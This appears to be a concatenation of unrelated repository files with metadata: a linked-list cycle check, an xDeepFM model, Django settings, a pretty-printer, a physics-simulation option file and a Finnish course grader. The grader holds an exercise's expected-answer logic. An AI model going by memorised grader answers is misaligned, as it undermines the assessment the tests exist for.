| 2021-01-18T03:12:22.402044 | 2015-12-28T04:31:19 | 2015-12-28T04:31:19 | 85,842,050 | 0 | 1 | null | 2017-03-22T15:05:20 | 2017-03-22T15:05:19 | null |
UTF-8
|
Python
| false | false | 771 |
py
|
from utils import ListNode
class Solution(object):
def hasCycle(self, head):
"""
:type head: ListNode
:rtype: bool
"""
if not head:
return False
prev, current = head, head.next
head.next = None
while current:
if current == head:
return True
next = current.next
current.next = prev
prev, current = current, next
return False
if __name__ == '__main__':
head = ListNode.build_linked_list([1, 2, 3, 4, 5])
head.next.next.next.next = head.next.next
print Solution().hasCycle(head)
head2 = ListNode.build_linked_list([1, 2, 3, 4, 5])
print Solution().hasCycle(head2)
print Solution().hasCycle(None)
|
[
"[email protected]"
] | |
d3ef5ccaa99988559bd5fde97a0082c970a270a1
|
1548ce77537dcd50ab04b0eaee050b5d30553e23
|
/autotabular/algorithms/ctr/xdfm.py
|
003e7cba0a5433e271cb0403bed753da731ebcad
|
[
"Apache-2.0"
] |
permissive
|
Shamoo100/AutoTabular
|
4a20e349104246bf825ebceae33dca0a79928f2e
|
7d71bf01d2b7d84fcf5f65c9f45c5cea1255d8a2
|
refs/heads/main
| 2023-08-13T21:34:34.329888 | 2021-10-02T07:06:00 | 2021-10-02T07:06:00 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,338 |
py
|
import torch
from autotabular.algorithms.ctr.layer import CompressedInteractionNetwork, FeaturesEmbedding, FeaturesLinear, MultiLayerPerceptron
class ExtremeDeepFactorizationMachineModel(torch.nn.Module):
"""A pytorch implementation of xDeepFM.
Reference:
J Lian, et al. xDeepFM: Combining Explicit and Implicit Feature Interactions for Recommender Systems, 2018.
"""
def __init__(self,
field_dims,
embed_dim,
mlp_dims,
dropout,
cross_layer_sizes,
split_half=True):
super().__init__()
self.embedding = FeaturesEmbedding(field_dims, embed_dim)
self.embed_output_dim = len(field_dims) * embed_dim
self.cin = CompressedInteractionNetwork(
len(field_dims), cross_layer_sizes, split_half)
self.mlp = MultiLayerPerceptron(self.embed_output_dim, mlp_dims,
dropout)
self.linear = FeaturesLinear(field_dims)
def forward(self, x):
"""
:param x: Long tensor of size ``(batch_size, num_fields)``
"""
embed_x = self.embedding(x)
x = self.linear(x) + self.cin(embed_x) + self.mlp(
embed_x.view(-1, self.embed_output_dim))
return torch.sigmoid(x.squeeze(1))
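if __name__ == '__main__':
    # Minimal usage sketch with made-up sizes (assumes the autotabular layers
    # imported above are available): three fields with vocab sizes 10, 20, 30.
    model = ExtremeDeepFactorizationMachineModel(
        field_dims=[10, 20, 30], embed_dim=16, mlp_dims=(32, 16),
        dropout=0.2, cross_layer_sizes=(16, 16))
    x = torch.randint(0, 10, (4, 3))  # batch of 4 samples, one id per field
    print(model(x).shape)             # expected: torch.Size([4]) of CTR scores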
|
[
"[email protected]"
] | |
ba4a59497f41ffefe8c698f0a65012b2d35d88e6
|
b5aeb0f8b8efc77d77842237a80cce90e529ac5f
|
/config/settings.py
|
04b0faaaab467f76b64edc86c9631e42ab3f4de5
|
[] |
no_license
|
Pillin/POC-Django-Cooker
|
b078502d403a90cc57c4691265235ce855c8d75e
|
e6ad88564d3045af4a418234a927970f928e3c58
|
refs/heads/master
| 2022-12-12T15:02:41.410674 | 2019-09-30T03:41:28 | 2019-09-30T03:41:28 | 210,078,139 | 1 | 0 | null | 2022-12-08T05:22:06 | 2019-09-22T02:13:33 |
Python
|
UTF-8
|
Python
| false | false | 4,361 |
py
|
"""
Django settings for nora project.
Generated by 'django-admin startproject' using Django 2.2.1.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
ENV = environ.Env()
ENV.read_env(os.path.join(BASE_DIR, '.env'))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = ENV('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = ENV('DEBUG')
ALLOWED_HOSTS = []
BASE_URL = ENV('BASE_URL')
# Application definition
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'django_extensions',
'users',
'commons',
'meals',
'tags',
'plates',
'menus',
'distributions',
'deliveries'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
),
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework_jwt.authentication.JSONWebTokenAuthentication',
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.BasicAuthentication',
),
}
# Authentication Settings
AUTH_USER_MODEL = 'users.User'
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
]
},
},
]
WSGI_APPLICATION = 'config.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': ENV.db()
}
DATABASES['default']['TEST'] = {
'NAME': 'nora_test'
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'es-cl'
TIME_ZONE = 'Etc/GMT+4'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
CSRF_USE_SESSIONS = True
STATIC_URL = '/static/'
LOGIN_REDIRECT_URL = '/home/'
LOGIN_URL = '/login/'
CSRF_COOKIE_SECURE = True
DATE_FORMAT = '%d/%m/%Y'
TIME_FORMAT = '%H:%M:%S'
SLACK_SERVICE_URL = 'https://hooks.slack.com/services/'
# CELERY CONFIGURATION
BROKER_URL = 'redis://localhost:6379'
CELERY_RESULT_BACKEND = 'redis://localhost:6379'
CELERY_ACCEPT_CONTENT = ['application/json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_TIMEZONE = 'Etc/GMT+4'
CELERY_ALWAYS_EAGER = False
|
[
"[email protected]"
] | |
e569fc7fc6e893e1d228b1d7e4971dcb65008fb8
|
45cc3880f3444276cebb0a7f91d3b146cd27b9d0
|
/beeprint/printer.py
|
63fe4de1510c7695ba066e8687e34780d93a7b3e
|
[] |
no_license
|
aijikl/beeprint
|
056aa84ff73da93c50143c83bed0fdf54bd37ee5
|
0380a942c0ad56ab219a51c728b4244a9b49f405
|
refs/heads/master
| 2021-01-20T04:25:26.858124 | 2017-04-04T06:50:36 | 2017-04-04T06:50:36 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,603 |
py
|
# -*- coding:utf-8 -*-
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import division
import sys
import traceback
import types
import inspect
from io import StringIO
from .utils import pyv
if pyv == 2:
# avoid throw [UnicodeEncodeError: 'ascii' codec can't encode characters]
# exceptions, without these lines, the sys.getdefaultencoding() returns ascii
from imp import reload
reload(sys)
sys.setdefaultencoding('utf-8')
from . import constants as C
from .utils import print_exc_plus
from .models.block import Block, Context
from .config import Config
from .debug_kit import print_obj_path
def pp(o, output=True, max_depth=5, indent=2, width=80, sort_keys=True, config=None, **kwargs):
"""print data beautifully
"""
if config:
config = config.clone()
else:
config = Config()
assert max_depth > 0
config.max_depth = max_depth
assert indent > 0
config.indent_char = u' '*indent
assert width >= 0
config.string_break_width = width
config.dict_ordered_key_enable = bool(sort_keys)
for k, v in kwargs.items():
        if hasattr(config, k):  # getattr() would wrongly skip options whose current value is falsy
setattr(config, k, v)
if not output:
config.stream = None
try:
res = str(Block(config, Context(obj=o)))
except:
print_obj_path()
raise
if config.debug_level != 0:
if config.debug_delay:
print(config.debug_stream.getvalue())
if not output:
return res
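if __name__ == '__main__':
    # Tiny usage sketch (assumes the surrounding beeprint package is importable):
    pp({'name': 'beeprint', 'nums': [1, 2, 3]})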
|
[
"[email protected]"
] | |
fcaf8123dd2fd421f5fc4ee011401898730fd1c1
|
be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1
|
/Gauss_v45r10p1/Gen/DecFiles/options/11114095.py
|
04981cbb389888968150d038dc6a792df1581176
|
[] |
no_license
|
Sally27/backup_cmtuser_full
|
34782102ed23c6335c48650a6eaa901137355d00
|
8924bebb935b96d438ce85b384cfc132d9af90f6
|
refs/heads/master
| 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,637 |
py
|
# file /home/hep/ss4314/cmtuser/Gauss_v45r10p1/Gen/DecFiles/options/11114095.py generated: Wed, 25 Jan 2017 15:25:18
#
# Event Type: 11114095
#
# ASCII decay Descriptor: [B0 -> K+ pi- (Higgs0 -> mu+ mu-)]cc
#
from Configurables import Generation
Generation().EventType = 11114095
Generation().SampleGenerationTool = "SignalRepeatedHadronization"
from Configurables import SignalRepeatedHadronization
Generation().addTool( SignalRepeatedHadronization )
Generation().SignalRepeatedHadronization.ProductionTool = "PythiaProduction"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Bd_KpiDarkBoson2MuMu,m=250MeV,t=100ps,DecProdCut.dec"
Generation().SignalRepeatedHadronization.CutTool = "DaughtersInLHCb"
Generation().SignalRepeatedHadronization.SignalPIDList = [ 511,-511 ]
from Gauss.Configuration import *
from Configurables import LHCb__ParticlePropertySvc as ParticlePropertySvc
from Configurables import Gauss, PrintMCTree, PrintMCDecayTreeTool, HistogramPersistencySvc, NTupleSvc, DumpHepMCDecay, DumpHepMCTree, GaussMonitor__CheckLifeTimeHepMC, GaussMonitor__CheckLifeTimeMC, GiGa, GiGaPhysListModular, GiGaHiggsParticles, GenerationToSimulation, PythiaProduction
ParticlePropertySvc().Particles = [ "H_10 87 25 0.0 0.250 1.0000e-10 Higgs0 25 0.000000e+000" ]
ApplicationMgr().ExtSvc += [ ParticlePropertySvc() ]
gigaHiggsPart = GiGaHiggsParticles()
gigaHiggsPart.Higgses = ["H_10"] # H_10, H_20, H_30
GiGaPhysListModular("ModularPL").PhysicsConstructors += [ gigaHiggsPart ]#
|
[
"[email protected]"
] | |
56fcd9d7569cd87ba0cc217a1be8e88301bac6f5
|
361ac3fcf36d80c792b60b7e2284cb1dc8d77944
|
/osa03-16_sanojen_ensimmaiset_kirjaimet/test/test_sanojen_ensimmaiset_kirjaimet.py
|
bd5cdde1c62e7f1ca35d82db216518e44c552e43
|
[] |
no_license
|
darkismus/mooc-ohjelmointi-21
|
48cc20391db4240104549d4f3834a67c77976f6d
|
5f72dd9cff78704a2a0f5bc1cc18c7740ce50c51
|
refs/heads/main
| 2023-08-01T03:35:13.244978 | 2021-09-14T10:49:37 | 2021-09-14T10:49:37 | 368,469,947 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,507 |
py
|
import unittest
from unittest.mock import patch
from tmc import points
from tmc.utils import load_module, reload_module, get_stdout
from functools import reduce
exercise = 'src.sanojen_ensimmaiset_kirjaimet'
def outputs_equal(str1 : str, str2 : str) -> bool:
return str1.lower() == str2.lower()
def get_correct(s : str) -> str:
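    # Expected output: the first letter of each word, one per line.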
return "\n".join([x[0] for x in s.split()])
@points('3.sanojen_ensimmaiset_kirjaimet')
class SanojenEnsimmaisetKirjaimetTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
with patch('builtins.input', return_value = "x"):
cls.module = load_module(exercise, 'fi')
def test_lyhyet_lauseet(self):
words = ["Heipparallaa", "Terve kaikille", "Moi vaan kaikille", "Simsalabim, sanoi taikuri",
"Mitäpä tässä hötkyilemään", "Vielä yksi testilause tässä"]
for testcase in words:
with patch('builtins.input', return_value = testcase):
try:
reload_module(self.module)
except:
self.assertFalse(True, f"varmista että ohjelmasti toimii syötteellä\n{testcase}")
output_all = get_stdout()
output = [x.strip() for x in output_all.split("\n") if len(x.strip()) > 0]
correct = get_correct(testcase)
len_correct = len(correct.split("\n"))
self.assertFalse(len(output_all)==0, "Ohjelmasi ei tulosta mitään syötteellä " + testcase)
self.assertTrue(len(output) == len_correct, "Ohjelmasi tulostaa syötteellä ({}) {} rivin sijasta {} riviä: \n{}".
format(testcase, len_correct, len(output), output_all))
self.assertTrue(outputs_equal(output_all, correct),
"Ohjelmasi tuloste\n{}\nei vastaa oikeaa tulostetta \n{} \nsyötteellä ({})".
format(output_all, correct, testcase))
def test_pidemmat_lauseet(self):
words = ["Mitäpä tässä turhia jaarittelemaan, vaan jaarittelenpa tovin sittenkin.",
"Tässäpä vähän pidempi testilause: nähdään samantien miten hyvin ohjelma toimii",
"Otetaanpa vielä yksi testi tähän loppuun: tässä lauseessa onkin aika paljon sanoja."]
for testcase in words:
with patch('builtins.input', return_value = testcase):
try:
reload_module(self.module)
except:
self.assertFalse(True, f"varmista että ohjelmasti toimii syötteellä\n{testcase}")
output_all = get_stdout()
output = [x.strip() for x in output_all.split("\n") if len(x.strip()) > 0]
correct = get_correct(testcase)
len_correct = len(correct.split("\n"))
self.assertFalse(len(output_all)==0, "Ohjelmasi ei tulosta mitään syötteellä " + testcase)
self.assertTrue(len(output) == len_correct, "Ohjelmasi tulostaa syötteellä ({}) {} rivin sijasta {} riviä: \n{}".
format(testcase, len_correct, len(output), output_all))
self.assertTrue(outputs_equal(output_all, correct),
"Ohjelmasi tuloste\n{}\nei vastaa oikeaa tulostetta \n{} \nsyötteellä ({})".
format(output_all, correct, testcase))
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] |